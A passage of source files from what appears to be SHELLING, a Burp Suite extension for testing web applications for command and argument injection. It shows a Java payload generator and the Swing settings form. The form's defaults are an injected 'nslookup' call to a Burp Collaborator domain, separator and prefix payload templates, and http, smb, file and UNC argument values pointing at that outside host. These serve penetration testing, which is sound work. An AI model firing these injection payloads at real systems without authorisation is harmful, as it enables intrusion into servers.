private final ShellingTab tab;
private final String payloadType;
public PayloadFactory(ShellingTab tab, String payloadType) {
this.tab = tab;
this.payloadType = payloadType;
}
@Override
public String getGeneratorName() {
if (payloadType.equals("mark")) {
return "Payload marker";
}
if(payloadType.equals("cmd"))
{
return "Command injection";
}
if(payloadType.equals("byte2"))
{
return "Byte (SHELLING)";
}
return "Invalid type";
}
@Override
public IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack)
{
if("byte2".equals(payloadType))
{
return new IntruderPayloadGeneratorByte(tab);
}
// this is what the attack object contains:
// attack.getHttpService() is the HTTP service
// attack.getRequestTemplate() is the HTTP request template
// hence, it's all we need to track down vulnerable page with an asynchronous payload
//
// https://portswigger.net/burp/extender/api/burp/IIntruderAttack.html#getHttpService()
IHttpRequestResponse req = SHELLING.callbacks.makeHttpRequest(attack.getHttpService(),attack.getRequestTemplate());
return new IntruderPayloadGenerator(payloadType,tab,"intruder",req, "manual insertion point (intruder)"); // I guess this will perform a vanilla template request before starting IntruderPayloadGenerator.
}
}
================================================
FILE: Java/src/uk/co/pentest/SHELLING/SHELLING.java
================================================
package uk.co.pentest.SHELLING;
import burp.IBurpExtenderCallbacks;
/**
* Used to store global variables.
*/
public class SHELLING {
public static IBurpExtenderCallbacks callbacks;
public static ShellingTab ShellingTab;
}
================================================
FILE: Java/src/uk/co/pentest/SHELLING/ShellingPanel2.form
================================================
<?xml version="1.0" encoding="UTF-8" ?>
<Form version="1.8" maxVersion="1.9" type="org.netbeans.modules.form.forminfo.JPanelFormInfo">
<NonVisualComponents>
<Component class="javax.swing.ButtonGroup" name="buttonGroup1">
</Component>
<Component class="javax.swing.ButtonGroup" name="buttonGroup2">
</Component>
<Component class="javax.swing.JCheckBox" name="jCheckBox5">
<Properties>
<Property name="text" type="java.lang.String" value="jCheckBox5"/>
</Properties>
</Component>
</NonVisualComponents>
<AuxValues>
<AuxValue name="FormSettings_autoResourcing" type="java.lang.Integer" value="0"/>
<AuxValue name="FormSettings_autoSetComponentName" type="java.lang.Boolean" value="false"/>
<AuxValue name="FormSettings_generateFQN" type="java.lang.Boolean" value="true"/>
<AuxValue name="FormSettings_generateMnemonicsCode" type="java.lang.Boolean" value="false"/>
<AuxValue name="FormSettings_i18nAutoMode" type="java.lang.Boolean" value="false"/>
<AuxValue name="FormSettings_layoutCodeTarget" type="java.lang.Integer" value="1"/>
<AuxValue name="FormSettings_listenerGenerationStyle" type="java.lang.Integer" value="0"/>
<AuxValue name="FormSettings_variablesLocal" type="java.lang.Boolean" value="false"/>
<AuxValue name="FormSettings_variablesModifier" type="java.lang.Integer" value="2"/>
</AuxValues>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Component id="jTabbedPane1" alignment="0" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Component id="jTabbedPane1" alignment="1" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Container class="javax.swing.JTabbedPane" name="jTabbedPane1">
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
<Layout class="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout"/>
<SubComponents>
<Container class="javax.swing.JPanel" name="jPanel1">
<Constraints>
<Constraint layoutClass="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout" value="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout$JTabbedPaneConstraintsDescription">
<JTabbedPaneConstraints tabName="Global settings">
<Property name="tabTitle" type="java.lang.String" value="Global settings"/>
</JTabbedPaneConstraints>
</Constraint>
</Constraints>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Component id="manualModeCheckBox" max="32767" attributes="0"/>
<Group type="102" attributes="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" attributes="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="103" groupAlignment="0" max="-2" attributes="0">
<Component id="jLabel3" pref="235" max="32767" attributes="0"/>
<Component id="jLabel5" max="32767" attributes="0"/>
</Group>
<Component id="jLabel4" min="-2" pref="249" max="-2" attributes="0"/>
</Group>
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Component id="targetOSCombo" min="-2" pref="292" max="-2" attributes="0"/>
<Component id="commandField" min="-2" pref="297" max="-2" attributes="0"/>
<Component id="argumentField" min="-2" pref="564" max="-2" attributes="0"/>
</Group>
</Group>
<Group type="102" attributes="0">
<Component id="jLabel7" min="-2" pref="374" max="-2" attributes="0"/>
<EmptySpace min="-2" pref="32" max="-2" attributes="0"/>
<Component id="feedbackChannelCombo" min="-2" pref="401" max="-2" attributes="0"/>
</Group>
</Group>
<EmptySpace min="-2" pref="28" max="-2" attributes="0"/>
<Component id="jLabel10" min="-2" pref="138" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="delayTimeSpinner" min="-2" pref="84" max="-2" attributes="0"/>
<EmptySpace min="0" pref="747" max="32767" attributes="0"/>
</Group>
<Group type="102" alignment="0" attributes="0">
<Component id="payloadMarkingBox" min="-2" pref="307" max="-2" attributes="0"/>
<EmptySpace min="-2" pref="107" max="-2" attributes="0"/>
<Component id="scannerChecksBox" min="-2" pref="330" max="-2" attributes="0"/>
<EmptySpace type="unrelated" max="-2" attributes="0"/>
<Component id="stopAllRunningScans" max="32767" attributes="0"/>
</Group>
</Group>
<EmptySpace max="-2" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace min="-2" pref="9" max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Component id="targetOSCombo" min="-2" max="-2" attributes="0"/>
<Component id="jLabel4" min="-2" pref="35" max="-2" attributes="0"/>
</Group>
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="3" attributes="0">
<Component id="jLabel3" alignment="3" min="-2" pref="35" max="-2" attributes="0"/>
<Component id="commandField" alignment="3" min="-2" max="-2" attributes="0"/>
</Group>
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" max="-2" attributes="0">
<Component id="argumentField" max="32767" attributes="0"/>
<Component id="jLabel5" max="32767" attributes="0"/>
</Group>
<EmptySpace min="-2" pref="18" max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Component id="payloadMarkingBox" min="-2" max="-2" attributes="0"/>
<Group type="103" groupAlignment="3" attributes="0">
<Component id="scannerChecksBox" alignment="3" min="-2" pref="25" max="-2" attributes="0"/>
<Component id="stopAllRunningScans" alignment="3" min="-2" max="-2" attributes="0"/>
</Group>
</Group>
<EmptySpace min="-2" pref="8" max="-2" attributes="0"/>
<Component id="manualModeCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace type="unrelated" max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Group type="103" groupAlignment="3" attributes="0">
<Component id="jLabel10" alignment="3" min="-2" pref="35" max="-2" attributes="0"/>
<Component id="delayTimeSpinner" alignment="3" min="-2" max="-2" attributes="0"/>
</Group>
<Group type="103" alignment="0" groupAlignment="1" max="-2" attributes="0">
<Component id="jLabel7" alignment="0" max="32767" attributes="0"/>
<Component id="feedbackChannelCombo" alignment="0" max="32767" attributes="0"/>
</Group>
</Group>
<EmptySpace min="0" pref="505" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Component class="javax.swing.JLabel" name="jLabel3">
<Properties>
<Property name="text" type="java.lang.String" value="Command to use"/>
</Properties>
</Component>
<Component class="javax.swing.JComboBox" name="targetOSCombo">
<Properties>
<Property name="model" type="javax.swing.ComboBoxModel" editor="org.netbeans.modules.form.editors2.ComboBoxModelEditor">
<StringArray count="3">
<StringItem index="0" value="All (default)"/>
<StringItem index="1" value="Windows"/>
<StringItem index="2" value="Nix"/>
</StringArray>
</Property>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="targetOSComboActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_TypeParameters" type="java.lang.String" value="<String>"/>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JLabel" name="jLabel4">
<Properties>
<Property name="text" type="java.lang.String" value="Target OS"/>
</Properties>
</Component>
<Component class="javax.swing.JTextField" name="argumentField">
<Properties>
<Property name="text" type="java.lang.String" value="PAYLOAD_MARK.BURP_COLLAB_DOMAIN"/>
</Properties>
<Events>
<EventHandler event="keyReleased" listener="java.awt.event.KeyListener" parameters="java.awt.event.KeyEvent" handler="keyReleased"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JLabel" name="jLabel5">
<Properties>
<Property name="text" type="java.lang.String" value="Argument"/>
</Properties>
</Component>
<Component class="javax.swing.JTextField" name="commandField">
<Properties>
<Property name="text" type="java.lang.String" value="nslookup"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="payloadMarkingBox">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Payload marking"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="payloadMarkingBoxActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="1"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="scannerChecksBox">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Active scanning"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="scannerChecksBoxActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JComboBox" name="feedbackChannelCombo">
<Properties>
<Property name="model" type="javax.swing.ComboBoxModel" editor="org.netbeans.modules.form.editors2.ComboBoxModelEditor">
<StringArray count="2">
<StringItem index="0" value="DNS (collaborator)"/>
<StringItem index="1" value="Delay (sleep)"/>
</StringArray>
</Property>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="feedbackChannelComboActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_TypeParameters" type="java.lang.String" value="<String>"/>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JLabel" name="jLabel7">
<Properties>
<Property name="text" type="java.lang.String" value="Feedback channel"/>
</Properties>
</Component>
<Component class="javax.swing.JSpinner" name="delayTimeSpinner">
<Properties>
<Property name="model" type="javax.swing.SpinnerModel" editor="org.netbeans.modules.form.editors2.SpinnerModelEditor">
<SpinnerModel initial="25" minimum="10" numberType="java.lang.Integer" stepSize="1" type="number"/>
</Property>
<Property name="enabled" type="boolean" value="false"/>
<Property name="value" type="java.lang.Object" editor="org.netbeans.modules.form.RADConnectionPropertyEditor">
<Connection code="25" type="code"/>
</Property>
</Properties>
</Component>
<Component class="javax.swing.JLabel" name="jLabel10">
<Properties>
<Property name="text" type="java.lang.String" value="Delay [s]"/>
</Properties>
</Component>
<Component class="javax.swing.JCheckBox" name="manualModeCheckBox">
<Properties>
<Property name="toolTipText" type="java.lang.String" value=""/>
<Property name="label" type="java.lang.String" value="Manual (non-auto) mode for Intruder & export (please refer the documentation for details)"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="manualModeCheckBoxActionPerformed"/>
</Events>
</Component>
<Component class="javax.swing.JCheckBox" name="stopAllRunningScans">
<Properties>
<Property name="text" type="java.lang.String" value="Stop all running scans"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="stopAllRunningScansActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="1"/>
</AuxValues>
</Component>
</SubComponents>
</Container>
<Container class="java.awt.Panel" name="panel1">
<Constraints>
<Constraint layoutClass="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout" value="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout$JTabbedPaneConstraintsDescription">
<JTabbedPaneConstraints tabName="Command injection">
<Property name="tabTitle" type="java.lang.String" value="Command injection"/>
</JTabbedPaneConstraints>
</Constraint>
</Constraints>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<Group type="103" groupAlignment="0" max="-2" attributes="0">
<Component id="basePayloadCheckBox" alignment="0" pref="1040" max="32767" attributes="0"/>
<Component id="advancedPayloadLabel" alignment="0" max="32767" attributes="0"/>
<Component id="doCommandInjection" alignment="0" pref="1031" max="32767" attributes="0"/>
<Component id="secondBasePayloadCheckBox" alignment="0" max="32767" attributes="0"/>
<Component id="thirdBasePayloadCheckBox" alignment="0" pref="1040" max="32767" attributes="0"/>
<Component id="fourthBasePayloadCheckBox" alignment="0" max="32767" attributes="0"/>
<Component id="fifthBasePayloadCheckBox" max="32767" attributes="0"/>
</Group>
<EmptySpace min="0" pref="794" max="32767" attributes="0"/>
</Group>
<Component id="seventhBasePayloadCheckBox" alignment="0" max="32767" attributes="0"/>
<Component id="sixthBasePayloadCheckBox" alignment="0" max="32767" attributes="0"/>
<Component id="eightBasePayloadCheckBox" alignment="0" max="32767" attributes="0"/>
</Group>
<EmptySpace max="-2" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Component id="doCommandInjection" min="-2" max="-2" attributes="0"/>
<EmptySpace type="separate" max="-2" attributes="0"/>
<Component id="advancedPayloadLabel" min="-2" pref="30" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="basePayloadCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="secondBasePayloadCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="thirdBasePayloadCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="fourthBasePayloadCheckBox" min="-2" pref="25" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="fifthBasePayloadCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="sixthBasePayloadCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="seventhBasePayloadCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="eightBasePayloadCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace pref="417" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Component class="javax.swing.JCheckBox" name="doCommandInjection">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Test for command injection"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="doCommandInjectionActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JLabel" name="advancedPayloadLabel">
<Properties>
<Property name="text" type="java.lang.String" value="Use the following syntaxes (see the manual for details on base syntaxes)"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="basePayloadCheckBox">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="COMMAND (this is the base payload (don't uncheck unless you know what you're doing)"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="secondBasePayloadCheckBox">
<Properties>
<Property name="text" type="java.lang.String" value="COMMAND + COMMAND_TERMINATOR"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="thirdBasePayloadCheckBox">
<Properties>
<Property name="text" type="java.lang.String" value="COMMAND_SEPARATOR + COMMAND"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="fourthBasePayloadCheckBox">
<Properties>
<Property name="text" type="java.lang.String" value="COMMAND_SEPARATOR + COMMAND + COMMAND_SEPARATOR"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="fifthBasePayloadCheckBox">
<Properties>
<Property name="text" type="java.lang.String" value="COMMAND_SEPARATOR + COMMAND + COMMAND_SEPARATOR + SUFFIX "/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="seventhBasePayloadCheckBox">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="PREFIX + COMMAND_SEPARATOR + COMMAND + COMMAND_SEPARATOR + SUFFIX"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="sixthBasePayloadCheckBox">
<Properties>
<Property name="text" type="java.lang.String" value="PREFIX + COMMAND_SEPARATOR + COMMAND + COMMAND_SEPARATOR"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="eightBasePayloadCheckBox">
<Properties>
<Property name="text" type="java.lang.String" value="PREFIX + COMMAND + SUFFIX"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
</SubComponents>
</Container>
<Container class="javax.swing.JPanel" name="jPanel5">
<Constraints>
<Constraint layoutClass="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout" value="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout$JTabbedPaneConstraintsDescription">
<JTabbedPaneConstraints tabName="Argument injection">
<Property name="tabTitle" type="java.lang.String" value="Argument injection"/>
</JTabbedPaneConstraints>
</Constraint>
</Constraints>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" attributes="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" attributes="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Component id="fixedArguments" min="-2" pref="463" max="-2" attributes="0"/>
</Group>
<Component id="jLabel11" alignment="0" min="-2" pref="256" max="-2" attributes="0"/>
</Group>
<EmptySpace min="-2" pref="37" max="-2" attributes="0"/>
<Component id="argInjectionCheckBox" min="-2" pref="388" max="-2" attributes="0"/>
</Group>
<Group type="102" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Component id="uncPathsCheckBox" alignment="0" min="-2" pref="467" max="-2" attributes="0"/>
<Group type="102" attributes="0">
<EmptySpace min="-2" pref="486" max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace min="-2" pref="14" max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Component id="injectAdditionalArguments" min="-2" pref="626" max="-2" attributes="0"/>
<Component id="bruteArgInjections" alignment="0" min="-2" pref="477" max="-2" attributes="0"/>
</Group>
</Group>
<Group type="102" alignment="0" attributes="0">
<EmptySpace min="-2" pref="18" max="-2" attributes="0"/>
<Component id="defaultArgBruteRange" min="-2" pref="721" max="-2" attributes="0"/>
</Group>
<Group type="103" alignment="0" groupAlignment="0" max="-2" attributes="0">
<Component id="injectHTTPCheckBox" min="-2" pref="601" max="-2" attributes="0"/>
<Component id="injectSmbCheckBox" min="-2" pref="618" max="-2" attributes="0"/>
<Component id="injectFileCheckBox" min="-2" pref="640" max="-2" attributes="0"/>
<Group type="102" alignment="0" attributes="0">
<Component id="customArgBruteRange" min="-2" pref="379" max="-2" attributes="0"/>
<EmptySpace type="separate" max="-2" attributes="0"/>
<Component id="customCharacterRange" min="-2" pref="283" max="-2" attributes="0"/>
</Group>
<Component id="jLabel6" alignment="0" max="32767" attributes="0"/>
<Component id="injectUncCheckBox" alignment="0" max="32767" attributes="0"/>
</Group>
</Group>
</Group>
</Group>
</Group>
</Group>
<EmptySpace pref="621" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="3" attributes="0">
<Component id="argInjectionCheckBox" alignment="3" min="-2" max="-2" attributes="0"/>
<Component id="fixedArguments" alignment="3" min="-2" max="-2" attributes="0"/>
</Group>
<EmptySpace min="-2" pref="6" max="-2" attributes="0"/>
<Component id="jLabel11" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="uncPathsCheckBox" min="-2" pref="25" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="injectAdditionalArguments" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="bruteArgInjections" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="defaultArgBruteRange" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="1" attributes="0">
<Component id="customArgBruteRange" min="-2" max="-2" attributes="0"/>
<Component id="customCharacterRange" min="-2" max="-2" attributes="0"/>
</Group>
<EmptySpace type="unrelated" max="-2" attributes="0"/>
<Component id="jLabel6" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="injectHTTPCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="injectSmbCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="injectFileCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="injectUncCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace pref="368" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Component class="javax.swing.JCheckBox" name="argInjectionCheckBox">
<Properties>
<Property name="text" type="java.lang.String" value="Test for argument injection"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="argInjectionCheckBoxActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="fixedArguments">
<Properties>
<Property name="text" type="java.lang.String" value="Check known injections"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="fixedArgumentsActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="bruteArgInjections">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Brute force argument flags"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="bruteArgInjectionsActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="injectHTTPCheckBox">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="http://BURP_COLLAB_DOMAIN/a"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="injectHTTPCheckBoxActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="injectFileCheckBox">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="file://BURP_COLLAB_DOMAIN/a"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="uncPathsCheckBox">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value=">\u005c\u005cBURP_COLLAB_DOMAIN\u005co" containsInvalidXMLChars="true"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="injectSmbCheckBox">
<Properties>
<Property name="text" type="java.lang.String" value="smb://BURP_COLLAB_DOMAIN/a"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="injectUncCheckBox">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="\u005c\u005cBURP_COLLAB_DOMAIN\u005ca" containsInvalidXMLChars="true"/>
<Property name="toolTipText" type="java.lang.String" value="UNC paths"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JLabel" name="jLabel6">
<Properties>
<Property name="text" type="java.lang.String" value="Use the following argument values"/>
</Properties>
</Component>
<Component class="javax.swing.JCheckBox" name="injectAdditionalArguments">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Inject additional arguments directly (without flags)"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="injectAdditionalArgumentsActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JLabel" name="jLabel11">
<Properties>
<Property name="text" type="java.lang.String" value="win-specific"/>
</Properties>
</Component>
<Component class="javax.swing.JRadioButton" name="defaultArgBruteRange">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Default range (a-zA-Z, LOTS of payloads)"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="defaultArgBruteRangeActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JRadioButton" name="customArgBruteRange">
<Properties>
<Property name="text" type="java.lang.String" value="Custom character range:"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="customArgBruteRangeActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JTextField" name="customCharacterRange">
<Properties>
<Property name="text" type="java.lang.String" value="abcdefghijklmnroqprstuvxyzACDEEFGHIJCKLMNROQPRSTUVXYZ"/>
<Property name="enabled" type="boolean" value="false"/>
